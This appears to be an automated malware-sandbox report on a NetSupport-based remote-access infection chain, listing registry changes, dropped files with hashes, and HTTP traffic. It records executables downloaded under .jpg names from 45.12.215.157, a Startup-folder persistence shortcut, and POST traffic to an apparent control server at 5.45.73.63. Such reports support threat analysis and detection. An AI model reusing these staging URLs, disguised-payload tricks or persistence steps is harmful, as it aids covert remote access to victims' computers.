HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000078000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2432
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2432
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3620
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3620
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000079000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3620
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3620
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3896
temp69.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
3692
KB24115436.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3692
KB24115436.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
4028
WinSupport.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
4028
WinSupport.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
EnableFileTracing
0
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
EnableConsoleTracing
0
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
FileTracingMask
4294901760
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
ConsoleTracingMask
4294901760
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
MaxFileSize
1048576
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASAPI32
FileDirectory
%windir%\tracing
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
EnableFileTracing
0
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
EnableConsoleTracing
0
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
FileTracingMask
4294901760
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
ConsoleTracingMask
4294901760
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
MaxFileSize
1048576
2268
client32.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\client32_RASMANCS
FileDirectory
%windir%\tracing
2268
client32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2268
client32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007A000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2268
client32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2268
client32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2268
client32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
2268
client32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@"%windir%\System32\ie4uinit.exe",-738
Start Internet Explorer without ActiveX controls or browser extensions.

Files activity

Executable files
49
Suspicious files
9
Text files
16
Unknown types
7

Dropped files

PID
Process
Filename
Type
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\msvcr100.dll
executable
MD5: 0e37fbfa79d349d672456923ec5fbbe3
SHA256: 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\IPCTL32.DLL
executable
MD5: 67184a4406f5ecb71c21583987038708
SHA256: e70cb83658b4fb9f7266ccf528219c835f0efbe5e06872d4f5fad8cd496b71f2
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIinv.dll
executable
MD5: 4a92f7d4924fda20d6a60096c59c282b
SHA256: 443dfc6205d85b1c32bb38aa9734a5e18bbbc8526c869552331b2d81b9b0c032
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\IPBR32.DLL
executable
MD5: 7597d4434eda66a2d118279cca71881e
SHA256: 46aab21e20c6d2b2bef9baf26ea746186f5a5894cae04a2c0ed56160ef6874ee
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcisys.sys
executable
MD5: 4b5f06667db76849628ddf0027d3bcf4
SHA256: 0adfd29f255a071706ef207d720bd206458168d535758216222925c3b3d89c95
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIHOOKS.DLL
executable
MD5: 3eedd8357b86b6a2f90188063e33d797
SHA256: 574eda2b8561364445e38f59ba93fb12210d07e1f80347bf67abb2a87e6891e9
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIMON.DLL
executable
MD5: 49549e31838886d755af38995b0c263d
SHA256: 47271356af5597a6704c654c5bc42a05a7cca9fde928b99f121ddc86bec71aa5
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.exe
executable
MD5: 8d9709ff7d9c83bd376e01912c734f0a
SHA256: 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIVDD.DLL
executable
MD5: 93bd1d145701c19394cce7b54e241631
SHA256: 19c56caee0519fd60c353fcf6ece8344fa09a652a0a3c88840aab94d6a0ecf43
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\gdihook5.dll
executable
MD5: 367a4e8f632f0f1d05b8ab9922dab331
SHA256: 8423c1be72387638c0143b8bc0edc91a9f4ad7262af8baec1c2464ec45be98a0
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIMSG.DLL
executable
MD5: 9d941b1a72abaa8cde01720eac699f2c
SHA256: 43b95c63be137a64329b346027a647959779d28074870972548f30dcd73c4370
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBBR32.DLL
executable
MD5: d91b5be1c3426035eab693dec962fbf7
SHA256: 80ee52d07ff8ccb745c6cb67b44523b6d38a3a3086a826c890080b79415f5124
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\CryptPak.dll
executable
MD5: 92fd46bd92d218ee3f1e800c1c5daef8
SHA256: 7e6616f762ab9f9850090d1c89507d2851222cfa1ff66982f84ac214c6fde570
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pciconn.exe
executable
MD5: 00ad420e7d2d2bd5e889aaad47eac553
SHA256: 378a03b6dbf7bd00bf0545378e10ab4b8fbd8d8f3f8273ca1adfc592f5a8e368
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pscrinst.dll
executable
MD5: 4725834d0416c9cbd376ff01f94f90f9
SHA256: 7e69de5b431e68536124f70815726773d4b8400d6999b1f5d891e44a67ccbab4
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA3.DLL
executable
MD5: 881ffb9fa34ce6b7f5239a4241609774
SHA256: 9298eb3fadb19786be826159dd2103a84927b8f4dc3613e159724e19a47e398b
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\clhook4.dll
executable
MD5: 6f787b2a2930ef76c468ee410adc86a3
SHA256: 47e7c7c11b8a8fab19f4f30c2f023b741e6057190b80a928e48d37af0e08ad16
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCICL32.DLL
executable
MD5: 00587238d16012152c2e951a087f2cc9
SHA256: 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcimonhook.dll
executable
MD5: 8c72f88ae953a8fbb33e885b7334e3d1
SHA256: 14dce1aeeea19bd346fc2e320e8b50449a48eb1e455e5faf8a29166b1d61c21f
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA4.DLL
executable
MD5: ffadb11ce73295fea7b4585a3bd927a9
SHA256: b6f85fff5bad3b6a1b75b5a4b3b34ef3db132c8be024894c175ac196b6c57be0
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\DBI.EXE
executable
MD5: 5d64121ab6415ec11effbd6d6761d46a
SHA256: 689facaf0e03034c42be4a4473e806bcd5272a40d7cf4e8b09083fff8744f278
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcigina.dll
executable
MD5: bbcecda514b5e4070bee6a1aeb86d99d
SHA256: b312cfc8995e1ea1654639618c931b9c8aaf791be87337949343e3fa0825c312
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\remcmdstub.exe
executable
MD5: 2a77875b08d4d2bb7b654db33a88f16c
SHA256: 8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA0.DLL
executable
MD5: 00d5990a151db3d1d59bb4e1f0e7a04f
SHA256: 109dce2fc3d0a99c8086595a4a33286c4c3bf4283a28068f88ab581cf2ec8c1f
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\gdihook5.sys
executable
MD5: 85ed5e4fa9a8b4776fa82b8bef5f2791
SHA256: 044f4a62b98a132de1f752fb33d654640d09221e74ebe1c062e6a276d22e5b69
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcicfgui.exe
executable
MD5: f44ebf7a82367c7b2d0702ad89bde583
SHA256: a1712260440eb8840da37854c374c7f4f6542c6ec16df61784428efbab658830
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\TCBR32.DLL
executable
MD5: b2a48c7fce59592ee7ad50472987ec9f
SHA256: 5eff3856b5e15826e2eed7c22e5fd8ca411b03c38b28672e003947414f515678
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA7.DLL
executable
MD5: ab45c36683663336434f96d2ac97c65a
SHA256: d6ed416b516b9b1002d84ce344039c86b3bbcceffb36fdf70e063ff6b85bdb90
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\AudioCapture.dll
executable
MD5: 771e97f76e213ed2d2b0b7c6639e1c68
SHA256: 8af1dd14b521d96d711b0ec5e1651d961b5f0d6ac18fbee3ef66e065e9766f72
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcicapi.dll
executable
MD5: dcde2248d19c778a41aa165866dd52d0
SHA256: 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\shfolder.dll
executable
MD5: c9e2eebb7bd947fb6499c7637cedd16d
SHA256: 24083daed66232a64c5219eb134bd8fab914c37aeb3c31376b3cea19b4259d18
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA5.DLL
executable
MD5: 3d227920379218138db4bfe1bd6c3da2
SHA256: 903ebcbc1eda6d1308f19531f9c5f5a8cf620dcc7a68da4d40d56d111a12df20
3692
KB24115436.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe
executable
MD5: 94cc7202ee76e7d650414ede964ebd9b
SHA256: 195e3d2424ab364edce6f54ccc3d21641cc6b3323ce01358951e98a064d8e85d
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA1.DLL
executable
MD5: 591d271da2b308cc83f06a3fc3cd0cc5
SHA256: 41ed0449f1d00fdcf0ed749437bd273610fffcaa34d7f51aab7542677c8e4a6c
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\TCCTL32.DLL
executable
MD5: eab603d12705752e3d268d86dff74ed4
SHA256: 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA2.DLL
executable
MD5: 739ee44735a13414649cf9d8aec2effb
SHA256: 7d5c2a71d6551df029de3aeca5b620171ca560800b9bab8942164e198cf2d469
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nsmexec.exe
executable
MD5: eb0e2ecaa54f94233735c0c353166362
SHA256: 2634a91c1a844f53598f83ba0f3381dfb062a3986391454a70ffcecd8d581590
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nskbfltr.sys
executable
MD5: 21864538f3a0992152d0d889837df58b
SHA256: 8bd445ee6ddb44e88fe8b650111997004c86bdcfd9e6b16e063c67b32eb8e66b
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\VolumeControlWXP.DLL
executable
MD5: 489ec38ad9fac51a445fd706da4737cb
SHA256: 15e8e30d4d997a1b3e09c87a833be8f8c05b7754398709fea6a08f5b04f83b43
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA6.DLL
executable
MD5: 20a6e4318b4e0b342f0b93255c418c82
SHA256: 1a553ac404a36dfaa372ac6f0de0987ed1bb17bf6e927092bb4130e9dd4b1133
3620
WScript.exe
C:\Users\admin\AppData\Local\Temp\temp69.exe
executable
MD5: b4c837b395483e5f430d00000b1d4c31
SHA256: 3f47f2175f27c02c36e7aa9fd485ef30bb03531e3c0f5d176f727e46b3a80c72
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCICHEK.DLL
executable
MD5: a0b9388c5f18e27266a31f8c5765b263
SHA256: 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\WdfCoInstaller01005.dll
executable
MD5: f9cf2db8b99dc50eab538c4d860ac1a4
SHA256: 865864a32aee78e588764f37847522fdb0bd1940ecd73b3c49d8f68b4d5bad71
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NSToast.exe
executable
MD5: a1ed96625d5714c5700290aa952b1986
SHA256: d4becbba58d0a594f96e3670abc907a60dfdc5f90ebe843626012a44506bd3a9
3620
WScript.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\1[1].jpg
executable
MD5: b4c837b395483e5f430d00000b1d4c31
SHA256: 3f47f2175f27c02c36e7aa9fd485ef30bb03531e3c0f5d176f727e46b3a80c72
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nspscr.sys
executable
MD5: 8822efbbf1cf663bd3b70510adff15d5
SHA256: 50401bc698658360de5eb23c38648e06f81235c98612a1eaac9f65718d72e200
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\Nbctl32.dll
executable
MD5: 96d283f596f720c7bdce0564030fd242
SHA256: 8ed968d09ae10f2aebc75d8b4d93e214ed3b38ff3af4e4f6ffbe52577c6bd281
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\HTCTL32.DLL
executable
MD5: 2d3b207c8a48148296156e5725426c7f
SHA256: edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
3896
temp69.exe
C:\Temp\KB24115436.exe
executable
MD5: 29b47d1f3d4417b4e50e5b1c0005298b
SHA256: aacadf7b3bfc2ac8a9a342e5372c77218efa9c67602c3a15441094170a5f52d4
3076
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].jpg
––
MD5:  ––
SHA256:  ––
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NSM.ini
text
MD5: 88b1dab8f4fd1ae879685995c90bd902
SHA256: 60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92
2268
client32.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\loca[1].htm
binary
MD5: c0cb5f0fcf239ab3d9c1fcd31fff1efc
SHA256: d03502c43d74a30b936740a9517dc4ea2b2ad7168caa0a774cefe793ce0b33e7
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.lnk
lnk
MD5: 6c3c39c3cb0be68ef1fb642071989723
SHA256: 787abfda449d6a14bcb55801f82877380dfd2ae10934da915821caa19470796b
2268
client32.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.1.err
text
MD5: 89a1261a5480eb0fc48067fcf29eafed
SHA256: f2d14f0d69ceced21b0ceaf9a5a7b0b985161a9f71bc2aea1c0ca2917669f5c5
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.ini
text
MD5: 182318fa51db5daa7008f8ed91f3fda9
SHA256: 00c60d416c139f841e1be8a1f5469c7747a62a78ccac4aff82b4b9ee4b2bef33
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\gdihook5.INF
binary
MD5: 703c7774b981e5d02e058340a27a5b75
SHA256: 4cfca868959f4e1b85bfd6b8a970ae06c0810d9c341f260df3ab8479089500e9
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\Control.kbd
binary
MD5: 4d9e1c4b8a78f4c8d6ce5235d42c8f1e
SHA256: 6d098726cbcdb392bc3a43d4d218072f5cadd4b82d83ada87bce65f7642af602
2268
client32.exe
C:\Users\admin\AppData\Local\NetSupport\NetSupport Manager\USER-PC_SW.bin
binary
MD5: a05c90ade114ebc52c3ebfc782f1a0e1
SHA256: 1373df395d4b10bcd38e7d3600b4f99409ad6f5d21b9f18a55164a44538f40ba
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nspscr.inf
binary
MD5: 967d9bd8558dca9df7f4fdd6f3284db5
SHA256: 914ea51fd68d4b872f9a1c9ca002081418e36a8cceae92772fb458625d823bfb
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nskbfltr.inf
binary
MD5: 26e28c01461f7e65c402bdf09923d435
SHA256: d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368
2268
client32.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.1_2019_07_11_151408.dmp
dmp
MD5: 31ff3c9ba467a39513e39bc4baff3519
SHA256: afc0ae1d801047f86490aa95b063b53d7d592305a96b51350d5d8ac22935ce0a
2268
client32.exe
C:\Users\admin\AppData\Local\NetSupport\NetSupport Manager\USER-PC_HF.bin
binary
MD5: 442597e89556b8e106f7dc4b68194be1
SHA256: 5d5ae155222084e6d4b290aa6181df03f42dd8c28bbad222d69a9d1344c56ca2
2432
WScript.exe
C:\Users\admin\AppData\Local\Temp\temp.vbs
text
MD5: b4a5edcf8bbd2415f41e412cc72da63c
SHA256: 590ab0dae68ce55e1551b1227ade50b16eae76059a49b3eeae05ad4c793ae791
2432
WScript.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\load2[1].jpg
text
MD5: b4a5edcf8bbd2415f41e412cc72da63c
SHA256: 590ab0dae68ce55e1551b1227ade50b16eae76059a49b3eeae05ad4c793ae791
3872
powershell.exe
C:\Users\admin\Desktop\documentation.vbs
text
MD5: c5a5998b01a477ed318a8934894786d5
SHA256: 60993fb444ed517afb422a96470a2df8a2e80a5c1b5525b9aafce77a078ef8a6
3872
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 4b92a079d7f4dfa0dfe9125e60fe7814
SHA256: e96b52bc25ae8ba162760c1f5159606ed78eb1ec4cba0f98aad2915ae22d8e04
3872
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF102627.TMP
binary
MD5: 4b92a079d7f4dfa0dfe9125e60fe7814
SHA256: e96b52bc25ae8ba162760c1f5159606ed78eb1ec4cba0f98aad2915ae22d8e04
3872
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YHFMM8KG4U2Z6E28PO8Q.temp
––
MD5:  ––
SHA256:  ––
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NSM.LIC
text
MD5: 7067af414215ee4c50bfcd3ea43c84f0
SHA256: 2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12
3076
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\favicon[1].ico
––
MD5:  ––
SHA256:  ––
3076
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071120190712\index.dat
dat
MD5: 6086a7b6e9bf8ca05d5df8e9f2932792
SHA256: f08ed0a694f14e8a52afb52d3fa4a461cd6e3f85d04b8aec8566da8725092e88
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071120190712\index.dat
dat
MD5: 10df8a304f3729376e6d69a0f9d83d14
SHA256: 94bdf3c304cfc707fde2ddf46956ae4e92ae8834d337ada1d89ccd76039a1970
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\MSIMGSIZ.DAT
smt
MD5: 60272cba5ad84466b761ccb17bc51037
SHA256: ed2a144c57ac894562da29c3ed8df7a741f5a07e4c053cd366417c3574ec4cae
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat
dat
MD5: 7470b2ffef14ba4a118cb1782ad461a4
SHA256: 39f398161a64403afdc5756bb6edcb17f56ca5947b27cae35a3cf3fd4e0ad5a8
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FXBC15DU\radiobox-online_org[1].htm
html
MD5: 14bae31bdb6ce0216a7c13a5f6ffaf83
SHA256: 07f2f4c293ef11d35c1f0ed0816cb022e6da1407a16197a84a5198015e7ae49c
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\03N2YC2E\radiobox-online_org[1].txt
––
MD5:  ––
SHA256:  ––
3076
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].png
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
3076
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
––
MD5:  ––
SHA256:  ––
3076
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico
––
MD5:  ––
SHA256:  ––
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat
dat
MD5: 915f37ea4d5f1e1b565f90e7fcf14c99
SHA256: 441b9ca9853c8568d247470c709fc9803ea2c14d405d4aca337b25987f9de49d
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\G1Z2SDJM\desktop.ini
ini
MD5: 4a3deb274bb5f0212c2419d3d8d08612
SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FXBC15DU\desktop.ini
ini
MD5: 4a3deb274bb5f0212c2419d3d8d08612
SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O53CQXBK\desktop.ini
ini
MD5: 4a3deb274bb5f0212c2419d3d8d08612
SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\03N2YC2E\desktop.ini
ini
MD5: 4a3deb274bb5f0212c2419d3d8d08612
SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3076
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini
ini
MD5: 4a3deb274bb5f0212c2419d3d8d08612
SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini
ini
MD5: 4a3deb274bb5f0212c2419d3d8d08612
SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini
ini
MD5: 4a3deb274bb5f0212c2419d3d8d08612
SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
19
TCP/UDP connections
12
DNS requests
5
Threats
28

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3076 iexplore.exe GET 200 204.79.197.200:80 http://www.bing.com/favicon.ico US
image
whitelisted
2432 WScript.exe GET 200 45.12.215.157:80 http://45.12.215.157/src/load2.jpg unknown
text
suspicious
3620 WScript.exe GET 200 45.12.215.157:80 http://45.12.215.157/images/1.jpg unknown
executable
suspicious
2268 client32.exe POST 200 5.45.73.63:4151 http://5.45.73.63/fakeurl.htm NL
text
binary
suspicious
2268 client32.exe POST 200 5.45.73.63:4151 http://5.45.73.63/fakeurl.htm NL
binary
binary
suspicious
2268 client32.exe POST –– 5.45.73.63:4151 http://5.45.73.63/fakeurl.htm NL
binary
––
––
suspicious
2268 client32.exe GET 200 195.171.92.116:80 http://geo.netsupportsoftware.com/location/loca.asp GB
binary
malicious
2268 client32.exe POST –– 5.45.73.63:4151 http://5.45.73.63/fakeurl.htm NL
binary
––
––
suspicious
3620 WScript.exe GET 404 45.12.215.157:80 http://45.12.215.157/images/2.jpg unknown
html
suspicious
